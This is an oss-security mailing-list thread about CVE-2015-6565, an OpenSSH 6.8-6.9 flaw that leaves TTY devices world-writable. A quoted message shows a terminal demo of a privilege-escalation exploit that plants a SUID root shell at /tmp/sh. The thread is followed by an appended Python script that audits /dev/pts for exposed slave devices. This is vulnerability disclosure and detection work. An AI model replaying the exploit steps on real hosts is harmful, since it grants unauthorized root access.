Date: Thu, 26 Jan 2017 21:52:43 +0100
From: up201407890@...nos.dcc.fc.up.pt
To: oss-security@...ts.openwall.com, Noryungi <noryungi@...il.com>
Subject: Re: Re: OpenSSH: CVE-2015-6565 (pty issue in 6.8-6.9) can lead to local privesc on Linux

Quoting Noryungi <noryungi@...il.com>:

The PTY slave must be root owned to get root obviously, for example when root logs in via ssh.

> Does not work on centos 7.1 (unpatched) running stock openssh.
>
> TTY capture works, /tmp/sh is created but user is unprivileged.
>
> On Jan 26, 2017 5:52 PM, <up201407890@...nos.dcc.fc.up.pt> wrote:
>
>> Hi list,
>>
>> I know I'm late to the party, but I was bored, so I decided to write an
>> exploit for CVE-2015-6565, which affects OpenSSH 6.8-6.9.
>> It is mostly considered to be a "DoS", even though Jann Horn publicly told
>> how it could be exploited for local privilege escalation, but I guess it's
>> either PoC||GTFO for users to update.
>>
>> From https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6565
>>
>> "sshd in OpenSSH 6.8 and 6.9 uses world-writable permissions for TTY
>> devices, which allows local users to cause a denial of service (terminal
>> disruption) or possibly have unspecified other impact by writing to a
>> device, as demonstrated by writing an escape sequence."
>>
>> I think the description should be updated.
>>
>> $ gcc not_an_sshnuke.c -o not_an_sshnuke
>> $ ./not_an_sshnuke /dev/pts/3
>> [*] Waiting for slave device /dev/pts/3
>> [+] Got PTY slave /dev/pts/3
>> [+] Making PTY slave the controlling terminal
>> [+] SUID shell at /tmp/sh
>> $ /tmp/sh --norc --noprofile -p
>> # id
>> euid=0(root) groups=0(root)
>>
>> Thanks,
>> Federico Bento.
>>
>>
>>
>> ----------------------------------------------------------------
>> This message was sent using IMP, the Internet Messaging Program.
>>
>



----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
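The condition the CVE description names (sshd leaving TTY slave devices world-writable) is easy to audit on a host. The following is an added detection check, not code from this thread; it assumes Linux-style numeric slave names under /dev/pts and flags root-owned world-writable slaves as the highest-risk case, since those are the sessions the reply above says are needed for privilege escalation.

```python
import os
import stat
from typing import Iterable, List, NamedTuple


class PtyEntry(NamedTuple):
    path: str
    mode: int   # raw st_mode bits (type + permission bits)
    uid: int


def is_exposed(entry: PtyEntry) -> bool:
    """A slave is exposed when it is a character device writable by 'other'.
    Normal sshd/login behaviour is 0620 root:tty; CVE-2015-6565 left 0622."""
    return stat.S_ISCHR(entry.mode) and bool(entry.mode & stat.S_IWOTH)


def audit(entries: Iterable[PtyEntry]) -> List[str]:
    """Return findings, root-owned slaves first (those are the dangerous ones)."""
    findings = []
    for e in sorted(entries, key=lambda e: (e.uid != 0, e.path)):
        if is_exposed(e):
            sev = "HIGH" if e.uid == 0 else "MEDIUM"
            findings.append(f"{sev} {e.path} mode={stat.S_IMODE(e.mode):04o} uid={e.uid}")
    return findings


def scan_dev_pts(root: str = "/dev/pts") -> List[PtyEntry]:
    """Collect numeric slave devices under /dev/pts (Linux devpts layout assumed)."""
    entries = []
    try:
        names = os.listdir(root)
    except OSError:
        return entries          # no devpts mounted or not readable: nothing to report
    for name in names:
        if not name.isdigit():
            continue            # skip 'ptmx' and anything else that is not a slave
        path = os.path.join(root, name)
        st = os.lstat(path)
        entries.append(PtyEntry(path, st.st_mode, st.st_uid))
    return entries


# Constructed sample, not taken from any real host: one root session left
# world-writable (the CVE symptom), one healthy 0620 slave, one exposed user slave.
SAMPLE = [
    PtyEntry("/dev/pts/3", stat.S_IFCHR | 0o622, 0),
    PtyEntry("/dev/pts/4", stat.S_IFCHR | 0o620, 1000),
    PtyEntry("/dev/pts/5", stat.S_IFCHR | 0o622, 1000),
]

if __name__ == "__main__":
    for line in audit(scan_dev_pts()):
        print(line)
```

Run it on an affected 6.8/6.9 host while root has an interactive ssh session open and the root-owned slave shows up as HIGH; on a patched host the mode is 0620 and nothing is reported.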
